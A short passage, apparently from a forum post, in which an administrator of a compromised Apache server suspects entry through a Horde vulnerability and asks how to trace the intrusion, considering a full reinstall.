And apache is run as apache:apache. I don't trust my system anymore, until I find the security hole. If someone tricked the system by using a security hole in, let's say, horde, I would install a new version of horde and check that no "poison" is left on the system. If I couldn't find out about the security hole, I wouldn't have an alternative to reinstalling everything.

But I just don't have a clue how to find out how the hacker got into the system. If I were able to find out, I see chances of fixing it.

----------

